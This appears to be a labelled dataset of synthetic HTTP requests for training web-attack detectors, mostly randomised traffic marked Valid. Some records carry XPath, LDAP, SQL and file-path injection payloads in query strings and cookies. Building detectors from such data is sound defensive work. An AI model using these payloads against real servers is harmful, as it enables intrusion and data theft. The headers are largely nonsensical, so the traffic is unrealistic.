X-Forwarded-For: 175.0.173.196
X-Serial-Number: 083639126
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

muoiet7s7=216&rteir=918354&nirhtlarnthenn=7lc

End - Id: 5167
Start - Id: 22323
class: Valid
GET /seewe1tlfni/enq7d7CE0eRVbeAEV5P/upnhac.html?8dnneejeeO=1047&qxtwEtemtnlsa=%26a%2B+hf+h%29t+inu%3Eciht%25&pjaccess_logu=4te%25ia&xOwej@QC=50ohnetxrosstittnU&zdhtvne=29832500&20uVkwHZbp-6=it+ht&nOqfoh1=941583&fmnkpiEtor3ttae=link9&e0=nmieson&snoet6oiu2eo=911&ddphsnestsk6=182&etogo=odrpse2etn7e&keI1slwlztdo=aesrtbee27naiHgIag&ods=iaJwWThM&sattefi=362 HTTP/1.1
Host: 98.12.224.0:3865
Connection: close
Accept: image/jpeg, image/jpeg;q=0.9
Accept-Charset: euc-cn;q=0.1, iso-8859-7, iso-10646-ucs-2, iso-8859-9;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 205.205.233.59
Cookie: 0deoeHhett3te=yUZ@rRGLbx;Ooeeuwdtubsv=ewx eadaeao &6e;et6tEnfs=idh;ieni=zPoihrtebeaco;tcp=m
Cookie2: $Version="57"
Date: Sun, 04 Apr 04 06:54:57 GMT
ETag: W/"Pap7AxQtnShQsrK"
Expect: 100-continue
From: ei4s@ebis.org
If-Modified-Since: Tue, 04 Oct 05 19:41:54 GMT
If-Unmodified-Since: Fri, 24 Sep 04 15:48:22 UTC
If-Match: "XA8kU-vRSH4yDRTGy"
If-None-Match: *
If-Range: "E7TL3QIp_LnB98NxB"
Max-Forwards: 112
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM ZW1vdG9mb3BhanRydHB5b3Nkc2xldHJhaGVhdG5lYWRvY3NzaUVlQXJudGNiZmNm
Authorization: NTLM ZWlpZXJudHl4b2ZjdG5pdHMxb3VneGRkaU50eW4wZWRidW9zY3VjOHJhZWVj
Range: -644,-6,-3532
Referer: http://www.jiil5l.fr/rhkcsr.aspx
TE: gzip,chunked;q=0.9
Trailer: Trailer
User-Agent: Mozilla/8.2 (Windows; U; Windows NT 0.3; oT-bp; rv:1.8.4) Gecko/68812991
UA-CPU: StrongARM
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 254x8392
Via: 0.6 2.45.18.151, 6siiha/7.1 www.tedodt.jpg
Transfer-Encoding: compress
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 813 120.61.228.249 "ekzhteuLsc" 
X-Forwarded-For: 4.252.134.91
X-Serial-Number: 8809830
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22323
Start - Id: 15779
class: Valid
GET /ioIc/totusFjiNhee/saqdcsrrueSe891/rlpeR6q-LY-/o@WByLN9OtZx9_.htm? HTTP/1.1
Host: www.eonueht.com
Connection: ensmoi
Accept: text/*, application/x-tar;q=0.9, video/quicktime
Accept-Charset: x-mac-hebrew;q=0.7, x-mac-ce;q=0.2, iso-8859-6, x-mac-greek;q=0.6, x-mac-ce;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 58.169.9.29
Cookie: io=arqg1a91J_De;teessu4t=(=yse;ye8=9y14o0b
Cookie2: $Version="20"
Date: Sun, 04 Nov 07 02:30:08 UTC
ETag: "8XuEGFmpUXxFo6Zy4f"
Expect: 100-continue
From: ue8iwlO@tint459.com
If-Modified-Since: Sun, 16 Apr 06 11:06:01 GMT
If-Unmodified-Since: Tue, 31 Oct 06 16:19:36 GMT
If-Match: *
If-None-Match: "HiCbfsm_heqdph219Gqc"
If-Range: "SWWdEzGjV8H1kQAd"
Max-Forwards: 109
MIME-Version: 4.2
Pragma: ioal='yMiveoe'
Proxy-Authorization: Digest qop=auth
Authorization: Basic U2lvZm06bmNmbnE=
Range: 56833-
Referer: /ninwrrvl/rshwc/ELie/enlgh/pzaud.jpeg
TE: deflate;q=0.9,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: eansLu/4.2
UA-CPU: StrongARM
UA-Disp: 996,4462,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9100x614
Via: FTP/8.9 15.63.90.102, HTTP/2.1 www.llnrrr.htm
Transfer-Encoding: yoro
Upgrade: tlub/4.7, hksiTB/4.2, jtoi5n/2.3
Warning: 404 124.90.161.164:454 "uesttf9iRtd" 
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 698228
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15779
Start - Id: 4433
class: Valid
POST /2kfwmxgb/zg06vEq/aiOWvd-erEWDADS@sR.js? HTTP/1.0
Content-Length: 191
Content-Language: l
Content-Encoding: compress
Content-Location: http://www.acob.de/6cW8/a26nca.bin
Content-MD5: VHR0d3RsbEV0ZGhsaGdobw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Aug 06 20:05:22 CET
Last-Modified: Mon, 08 Jun 09 05:40:37 CET
Host: 22.62.122.133:80
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr, x-mac-japanese;q=0.0, gb2312, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: insffoy-t, teh-S
Cache-Control: N='llsiosoa'
Client-ip: 30.242.53.46
Cookie: snsG=18802348;grmrn2dossths3n=sf;otdtptsrb0aihp=g0b oe;cttYs=89;HX8hG=85&gon dnhoehl;-v.tD4Y=cchild
Cookie2: $Version="774"
Date: Mon, 03 Jul 06 21:08:24 GMT
ETag: "Gmpo2_GvpsQPDAy"
Expect: 100-continue
From: rh3qx@gsao.net
If-Modified-Since: Thu, 04 Mar 04 09:19:12 UTC
If-Unmodified-Since: Mon, 05 Jan 04 07:25:48 UTC
If-Match: *
If-None-Match: *
If-Range: "B.EhRi.Ss.qO9RVO71hL"
Max-Forwards: 7322
MIME-Version: 5.7
Pragma: fERa=odxEejs
Proxy-Authorization: Basic U25KT3M6cml0YXV6Yw==
Authorization: NTLM U2VpWnhyYW9lb2F0c25ydHdvYTVvZWVJUmVocjJ0dW90dA==
Range: 0-,20077-,-023590
Referer: http://3lsetoS.be/ttreeln/ca0tegn0/t1evs.jsp
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.1 (X11; U; Unix 5.1; hr-io; rv:0.7.3) Gecko/80418681
UA-CPU: MIPS
UA-Disp: 3339,068,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 604x596
Via: 5.1 31.77.65.167
Transfer-Encoding: deflate
Upgrade: zscdse/7.1, 1ntn/4.8, caw/0.2, nhnaei/2.6, jrla3/2.1
Warning: 774 98.7.54.149 "snI8ejlpssn" "Tue, 19 Apr 05 06:05:00 CET"
X-Forwarded-For: 9.134.134.209
X-Serial-Number: 91470301728015054
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

child1iT=ejr-eUdyt9vuyicohhl&MHI-qk7q=peq eAa3or5rtte&Spsd=M3s+&fmtzqpnoi0hoI=oe&vncn8Mf4-aj=oYQl5&ttwn4oie17is=9487520789&echatbsjaarrwim=tlisooI21tih&ip0=dtemm05la&oape3drohiqer=netcatA2d

End - Id: 4433
Start - Id: 28617
class: Valid
GET /sqihqrqnTpUett/nAlbvrbNQI/egoAennurdlsuttoeUs/eOm8OFG9fW5x.AvLai/wIa.rEp-0St_bZ/1dUAMallbdlWsystemnsf/litExTOl/eTFq.g95QC3z@nvjcmB/o8W9/ZNQ6uMaccess_logpIoM/bM@8Uy8Da.bx.jpeg?ehordue=3678223&Eeo1fdab=lyV_kzGrvOGW&Dui=42613324&cyjlos3=re6RznunssFc1wF&8system@nxxusrCATB=79286&medndphnixt=iWLUnOUKi&7wAlocationJuVC=slnnfgct&c3iHacutdnRta=o&dtvSsosebW2=l HTTP/1.0
Host: www.8elrSn.fr
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 216.30.78.208
Cookie: ndxzs8A7=Onr+eehry mcmrtmp;IS4K=5;3lenhjv=\Duaie tmpc
Cookie2: $Version="9"
Date: Tue, 02 Jan 07 15:19:41 CET
ETag: "m61Hns7ULAUNoP7"
Expect: ifAs=rCls7
From: i3ltd@nsmTrto.cz
If-Modified-Since: Fri, 15 Sep 06 02:41:36 UTC
If-Unmodified-Since: Wed, 20 Jan 10 24:01:54 UTC
If-Match: "B44sQc4HiPuLC1I96O"
If-None-Match: *
If-Range: *
Max-Forwards: 94
MIME-Version: 9.3
Pragma: r=a6
Proxy-Authorization: Digest opaque="nteit8ao"
Authorization: 2hrdsa en5so=arlrae
Range: 554798-,-48,6195-
Referer: /lwneCee/hueb/boulss.pdf
TE: chunked;q=0.7,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/6.6 (X11; U; SunOS sun4u 3.3; 3l-rT; rv:7.4.4) Gecko/58068670
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 680x3732
Via: FTP/7.6 www.t7Lu.css:11
Transfer-Encoding: iiTesn
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 155 197.235.161.66 "evehe7plsp7lnun" 
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6114886940251
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28617
Start - Id: 48776
class: XPathInjection
GET /MndmI6elir/e9gEedmaaGi/iereronetintiaee3ut/recW2CuA.5Jo35iOo6v7/f0PxdQInoXz/ahuerheemeoRaabah/W8PO/oxAJRwFScQ/ep3/csQgdQ@.css?el8eexbofnjCnk=h1RE4jEkZiai&vehhkPRPwM=e1Nceuiy&eeoywatploIe=asxZfrl%26xmllos&5f1xp_g3Np=+e%7E%3Cvktn%3Ceup&ovtM=04177+++++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++++451%3D&Rochwl=dRiOG&a0PmhS8t=mexecchildi+&brimeartrn=ne&egxo2ixXmN6lg=dn0%40p_bBJ&cuenrtg12seafp=43&y87septsyertai=32slEesprocessing-instructionc3f%5D5oaeefNn&k95TSphpW=ncaalnINHdtur HTTP/1.1
Host: www.dneenisbaI.st
Connection: dhiccfT
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 52.82.251.39
Cookie: rHhoIl=ih8c) ;Ld=Am4 'scriptcv
Cookie2: $Version="67"
Date: Mon, 29 Nov 04 05:57:07 CET
ETag: "XaSF7ffVYiharLa0lA"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Sat, 12 Apr 08 17:37:07 GMT
If-Unmodified-Since: Thu, 06 Jan 05 23:22:59 GMT
If-Match: *
If-None-Match: "kAy0arUAypvLS.f@_V"
If-Range: Wed, 21 Feb 07 22:57:55 UTC
Max-Forwards: 4378
MIME-Version: 6.1
Pragma: 5oPurHi='coe2ai'
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: Digest nc=9C92a5FC
Range: -333764,-7
Referer: /Eeucoma/8t2mei/dnryns/Snh9a.gz
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.3 (compatible; MSIE 0.9; Linux i386; AeLcE)
UA-CPU: MIPS
UA-Disp: 019,118,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0640x829
Via: HTTP/4.4 229.74.162.185, 7.3 www.cssr3TOe.html
Transfer-Encoding: eokhc; dyEst=b0uq4
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 626 www.ecaver.tiff "tekucdTs" "Thu, 03 Dec 09 04:34:47 UTC"
X-Forwarded-For: 160.70.37.175
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48776
Start - Id: 6668
class: Valid
PUT /owVEF/sls/rfZORY@1H/ab/rDJwq/rGBb5LbM/is4AjrxJP/sPoOIm8fbNUkDrM/yNJtoPj/R7tni9moe.sh? HTTP/1.1
Content-Length: 81
Content-Language: 25ohs
Content-Encoding: deflate
Content-Location: /ihrwai0F/itimSkj/orntst/nefel.mp3
Content-MD5: aGppZTVkdG90N2xkYWlTeA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Dec 07 19:41:56 GMT
Last-Modified: Wed, 14 Apr 04 19:59:25 CET
Host: www.bwhdote.it
Connection: keep-alive
Accept: application/*;q=0.4, video/*, text/xml
Accept-Charset: x-mac-turkish;q=0.1
Accept-Encoding: deflate;q=0.3, deflate, identity;q=0.0, identity, deflate
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 217.190.201.170
Cookie: WnTdnfwuLr4=eai?5de;imo3=gt17thhtka9s77;0sod7NhimrA26m=6178631562
Cookie2: $Version="10"
Date: Mon, 18 Feb 08 22:00:56 GMT
ETag: "vYsxOSquYPtEQpUW"
Expect: 100-continue
From: kmoes@oyExaqk5j.ch
If-Modified-Since: Wed, 23 Aug 06 01:26:38 GMT
If-Unmodified-Since: Mon, 14 Sep 09 06:54:20 GMT
If-Match: *
If-None-Match: "PadfirSYfyyYUnANxJS"
If-Range: Sun, 14 May 06 03:52:01 CET
Max-Forwards: 4264
MIME-Version: 7.5
Pragma: l=eiqhIr
Proxy-Authorization: Basic NG1kanBpOmllSGVocmVp
Authorization: Digest uri=/hsnaio/1nnwO/sdgtkre0.fgf
Range: -70
Referer: /eduPtb/Uwin/e3ion2/er8B3rb.shtml
TE: chunked,deflate,chunked
Trailer: Accept-Language
User-Agent: iosseoo (epOCUSf0mC; 3xVLDN; 2H0Q9N; n2JPnD-3; aFH38A)
UA-CPU: Sparc
UA-Disp: 7591,1766,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 075x397
Via: 2.0 206.125.38.37, oel/6.7 213.12.110.51
Transfer-Encoding: identity
Upgrade: ouir/8.6, le8mS/3.9, uip/7.9, oinia/7.0, igMoc/1.2
Warning: 713 www.8inlfdnc.js "eao0a8Dsgeo" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

odsaIGa=a &iluO=01994011&diuaoitittttISn=slno&leyumu=998650&dtiqsc=58&O0nh=tH2VrS

End - Id: 6668
Start - Id: 37711
class: LdapInjection
POST /uCOgGV@rhr/emrt8tr09a/s-qtswjbGgTB6E3dU4/Zjcryplsp.asp? HTTP/1.1
Content-Length: 86
Content-Language: tsoeqrke
Content-Encoding: gzip
Content-Location: http://www.eHwo0pIe.cz/cefu/iPamhzy/jeortee.txt
Content-MD5: cjluNjhzb3RoZXR0ZHJzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Feb 08 08:47:11 CET
Last-Modified: Tue, 29 Sep 09 04:35:16 GMT
Host: www.c0tr5e.cz:80
Connection: tRsenw
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: 0e=w
Client-ip: 201.29.56.23
Cookie: daestreLitiv=q;Eo=mhneIeaser;snoteeeprngtBw=4o5aa7gvtaneeleo
Cookie2: $Version="321"
Date: Sat, 01 Oct 05 14:09:11 GMT
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Mon, 04 Oct 04 15:56:13 UTC
If-Match: "nxEYP-ZjWH4CApW"
If-None-Match: "iWbkGij.vSxm----w"
If-Range: Mon, 31 Jul 06 10:33:05 CET
Max-Forwards: 686
Pragma: no-cache
Authorization: NTLM c2x0b3Q2cnJ1Z3R0b2xkdUhzeWhzZXJvbHczckpzZnll
Referer: http://www.eses.org/rdP5c/Teoe/iotdm5.pdf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: rios/8.3.5.5
UA-CPU: MIPS
UA-Disp: 999,847,16
UA-Color: color16
UA-Pixels: 8766x859
Via: ltpd/2.1 228.122.131.86:78
Transfer-Encoding: deflate
Upgrade: nymhep/4.3
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 053115321

ca0scdstenZcbe=) (|    ( cn=*o   'brien*    )(mail=*o 'brien*)  

End - Id: 37711
Start - Id: 44738
class: PathTransversal
GET /OWVoMg@DTgE-echopl/dpsGOT4/oae9sseo0OtaTve/rUZ@_/dxtenhathms/i2AiE.lix/1aJM6mwba.ZDnph-L/rryJ4PsVNoW/tW-1iOj2M/negsrOq/UgNlnF3.0Vh/ip@zraEUEY@6tHF5.php4?imgZCb94S=4031499642&e3hbieht0hp=collection%28++file%3A%2F%2F%2Fc%3A%2Fqro%2F9aratde.xml++++%29 HTTP/1.1
Host: www.em5ukt.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 11.50.154.165
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="152"
Date: Thu, 24 Mar 05 20:09:51 GMT
ETag: W/"yL4GXeSmQVWeS4c"
Expect: 100-continue
From: p3teud@syl6D.biz
If-Modified-Since: Sat, 29 Dec 07 01:09:44 GMT
If-Unmodified-Since: Wed, 11 Jun 08 17:16:14 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 23 Jan 10 17:48:31 CET
Max-Forwards: 39
MIME-Version: 4.7
Pragma: no-cache
Authorization: NTLM bmJyYWZsc2lvSVdhZnNvb2FlbnJlZGZpRXZpZm1tMklpaHVnaTl0
Range: 218-,38304-
Referer: /tpiaiaUe/eoNodi4/Oe6i/ueArMof.txt
Trailer: TE
User-Agent: Mozilla/5.4 (compatible; MSIE 9.1; Open BSD i586; ejIlege8; ljef1)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: deflate
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44738
Start - Id: 29571
class: Valid
GET /hntrA/mNmonOit/oPBPr0Zh/aTlQ_v@/wgmOAk9JlFGF9/2scriptc@ftppositionGhhFU/l8y.gif?uye=Rd&nlfr=lsu4osWh1stnotmkd&ws=6&nz1lsid=t&9PB5=n4srseahifNusr&rt1ysnrL2k=esp&esehn=I7q&tetasmoOenr2us=856097 HTTP/1.1
Host: www.ELioktc.st:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, compress;q=0.5, deflate, compress;q=0.7
Accept-Language: *
Cache-Control: aMlg='70'
Client-ip: 241.190.126.224
Cookie: uaTaitsqtzq=3srm;uhdnoeEiro4ua=niilley;ileixALa0e=10049
Cookie2: $Version="7"
Date: Fri, 04 Apr 08 07:03:05 CET
ETag: "CNsoJzy-6bRfbsyxA1"
Expect: 100-continue
From: d1em@0njeio.be
If-Modified-Since: Wed, 03 Nov 04 07:38:42 UTC
If-Unmodified-Since: Thu, 02 Oct 08 17:09:17 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 09 Jan 05 02:35:29 GMT
Max-Forwards: 351
MIME-Version: 2.0
Pragma: nu=b6e
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: NTLM U2djOWdlZUxlMG9Bc3RpYmxuMTV0cnJuaXRoYWxyZzBqQXN0ckxiZWhhYW5zYTI=
Range: 825369-97,558284-7,646196-4450
Referer: http://www.lsie.it/bosiS.sh
TE: trailers,trailers,gzip
Trailer: Trailer
User-Agent: bemxhoeE
UA-CPU: 68000
UA-Disp: 5272,2339,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3909x9569
Via: 2.9 www.3l65ut.png
Transfer-Encoding: compress
Upgrade: gih7ot/7.0, vjwg/9.7, tttnua/4.6
Warning: 880 250.169.70.244:31 "ob2rr7pb4tes" "Sun, 10 May 09 07:32:46 UTC"
X-Forwarded-For: 223.17.177.5
X-Serial-Number: 97266154050
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29571
Start - Id: 24783
class: Valid
GET /tlmA9U_/5ydfmistu/ts1nl/yrR3gtLLyRZ/ae/tNTLyvkpow/eyjnd6eeeh1/2Q9adwsnte5tetenl/xf/sZ5lc59/p3IqMTprocessing-instructionTTchttps.js? HTTP/1.1
Host: 187.217.146.79
Connection: keep-alive
Accept: image/gif
Accept-Charset: windows-1252;q=0.2, iso-8859-7, iso-2022-kr;q=0.9, iso-8859-5;q=0.4
Accept-Encoding: gzip;q=0.1, gzip;q=0.1, compress;q=0.7, identity, gzip
Accept-Language: awaEs-mn;q=0.4, tiaro9-ir;q=0.6, wsijE6t-N;q=0.0, srdmf-szsetena, 9lS-chitN;q=0.7
Cache-Control: max-stale=9215
Client-ip: 247.158.174.187
Cookie: sd71iE=gafyNemolel;esnur=ina> nuea>nhwtnru;iisihovsjah=4359
Cookie2: $Version="840"
Date: Wed, 30 Apr 08 18:12:56 UTC
ETag: "fU82WBxHDmAQ8Z0nm"
Expect: 100-continue
From: iesi0goR@Pnih.ch
If-Modified-Since: Mon, 31 Jan 05 24:54:02 GMT
If-Unmodified-Since: Tue, 26 Aug 08 13:23:27 CET
If-Match: *
If-None-Match: "n4JcPzPN..vdmyg"
If-Range: Mon, 02 Feb 09 22:20:29 UTC
Max-Forwards: 89
MIME-Version: 8.0
Pragma: emcg=aidesohi
Proxy-Authorization: Nixaoe ihecer=0gNx
Authorization: Digest realm
Range: 0-7,-481455
Referer: /sthEap/Zs1bA.bin
TE: deflate,trailers,gzip
Trailer: Accept
User-Agent: Mozilla/6.5 (X11; U; Linux i586 6.2; Ot-ey; rv:4.0.3) Gecko/71462113
UA-CPU: MIPS
UA-Disp: 1309,0345,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 540x246
Via: 4.6 150.18.108.3:7, HTTP/9.5 www.rfet6l.htm
Transfer-Encoding: identity
Upgrade: hteo/0.4, eeior/7.7
Warning: 860 www.bs37c.png:5265 "rnistmsoesi" "Sun, 27 Mar 05 17:11:49 UTC"
X-Forwarded-For: 94.66.48.118
X-Serial-Number: 05073071780221168240
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24783
Start - Id: 36899
class: LdapInjection
GET /lsgewe8e/l0b2E.png?amdonzesu=go&WeTohhtc=se9&aeasaAnEihoI=a7N%5CodttlrO%3C3++%28So&tauE2o=sy&Bboot.iniselectMYnscript0W=ihb&sdnitmbahsE=eshutdownxdo%2Fmailq1autoexec&t5buB4o6owAsBre=tUP3YnH HTTP/1.1
Host: 185.184.230.73
Connection: keep-alive
Accept: text/xml
Accept-Charset: euc-cn, iso-8859-6;q=0.2, x-mac-cyrillic, iso-8859-1
Accept-Encoding: *;q=0.0
Accept-Language: i-taa;q=0.9, tRsti-rs2iqia;q=0.4, oieIs-iIsE, 7n2ft-sliae7nN
Cookie: v66tisetpya=wrnm1cEQs;ucis=)    (   | (cn=*o'brien*    )(mail =*o'brien*  );iznwoyieiuhstl=rtezieuyai5Lnr;14e5tc7kf4=u1S5Zfg
Date: Mon, 22 May 06 14:59:26 CET
From: y4ueptet@tunyhsEr.uk
If-Unmodified-Since: Wed, 29 Mar 06 23:45:18 UTC
If-Match: "bcaCdYaJfo1sXyu"
If-None-Match: *
Max-Forwards: 72
Authorization: Digest realm
Referer: http://www.hele.de/irq4/ssvoe.conf
TE: trailers
User-Agent: Mozilla/1.4 (X11; U; Linux i586 6.1; th-io; rv:1.3.2) Gecko/38596099
Via: 0.8 138.195.242.106, FTP/0.9 30.77.215.60, FTP/2.7 www.noli0ri.png:9086
Transfer-Encoding: wead; Inccbam=qmte
Upgrade: seGnn/2.7
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36899
Start - Id: 42590
class: SqlInjection
GET /hiaoitim93ilnkuaa/sro/libJ0ja0@svlX/6K6kzrS/ewe48dxthHA2nr/lVw2MBa1rtc2/oD.jpg?eii=7182407&benjezoeoa=oqas&qbftpt@Nt=select+gyDiuer+from+++ALL_USERS&6jXAYLORN=6180434&uin=Slinkaatfe2t&QvpLNOM=r%3Cfnnc%260NdstD&-ZAlogC=eweai&9R2q1Z=48097595&Cpstur=Bp HTTP/1.1
Host: www.c0gselo.uk
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, x-mac-arabic
Accept-Encoding: *
Accept-Language: h6-lnnrubk;q=0.3, je4e-aaaGii;q=0.4, hcow9fe-cpiLe3o;q=0.8
Cache-Control: no-store
Client-ip: 218.19.16.82
Cookie: nsot=8QO;x@Rx=7uaWeonhaecanag;Oo6du-JcN=89530984;l4bsnnafare=350;moasiOh4I=sfaIxd7saseaa
Cookie2: $Version="502"
Date: Sat, 16 Feb 08 01:39:42 CET
ETag: W/"K-TXvelidMVDBS4x"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Mon, 29 Jan 07 18:12:32 GMT
If-Unmodified-Since: Wed, 24 Oct 07 16:56:11 CET
If-Match: "U.eTCu-t1pQUGgMn"
If-None-Match: *
If-Range: ".i0RC-BNWzZKkalv"
Max-Forwards: 2767
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic YXJ0MTpkaVNiYW4=
Authorization: Basic ZWF0aTplbDlybXQ=
Range: 5-,-2176,0697-71705
Referer: http://si7oget.it/foet/N2rtZ.dll
TE: trailers,chunked;q=0.9,trailers
Trailer: User-Agent
User-Agent: aeetEajEc/1.5
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4922x3138
Via: HTTP/0.8 www.aed2Nnsl.jpg, 5.2 152.201.56.54
Transfer-Encoding: srsy
Upgrade: r8az/4.5, ShnfKa/1.6, Ne8h/2.3, uo3m/9.4, baps/3.8
Warning: 624 226.11.216.12:21651 "base2a5yw9vFoeoe" "Wed, 13 Sep 06 03:02:24 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 7047593
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42590
Start - Id: 18154
class: Valid
GET /trttclsatmsrtnd/Sa/i@f/Elike-9FbthQzo/links67samKB.CGLkD/t3ifinnC/wc/-lf2fPBcWKwindow.opencopykZwget/-ht.mdb?Ttytcdd5L=ei&uSrmYx=wbodyr&ddal=mttta1ztiat&aogr8e2n=tmQ3Hhv&5t@openO=8GAxMkHw&Qtnh=hhtavhztot&b1tciSacj=9nl%408c&aeJwMmc=%3DIkescript&51js5co=47704&otTf7e=0&vuaEddrui=e0ndtlia&0armC79N=exmljDesFe&sseoOhik=TeAledxar9&drtiegtncejl=eeyhttpq HTTP/1.1
Host: www.pdn2.uk:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: genlez-i2nsu, bpATpu-y, hCtE-fvhnXtee, nid-nqnaa9
Cache-Control: max-age=5
Client-ip: 116.171.108.87
Cookie: yeimiinlIO=0;astlades9htI=o ecmd;2hEYhjtotmho2=DK;tnHtn=9225665322;ecifsL=hoei
Cookie2: $Version="841"
Date: Fri, 15 Oct 04 17:16:45 GMT
ETag: "4OnTg4GXhOJaxReCc"
Expect: 100-continue
From: espenT@te4e.biz
If-Modified-Since: Mon, 29 Nov 04 11:48:23 CET
If-Unmodified-Since: Thu, 27 Mar 08 10:23:48 UTC
If-Match: *
If-None-Match: "VF7jPXSee-Vl74CfMx"
If-Range: "u7GM7tU8iGoO0rVQ"
Max-Forwards: 4559
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: csocd nvaAeEt=tlaE
Authorization: keStlt oAheoe=tbscrS
Range: -69064,75-37,650952-
Referer: /gnter/wpnnfe0/smtt.dll
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: at2msuitaeotsdzp
UA-CPU: 68000
UA-Disp: 2033,9785,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3922x0648
Via: 1.1 33.27.147.237
Transfer-Encoding: ftSteu
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 913 178.21.230.69 "hdthx" 
X-Forwarded-For: 47.138.63.112
X-Serial-Number: 21129432693089718
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18154
Start - Id: 21561
class: Valid
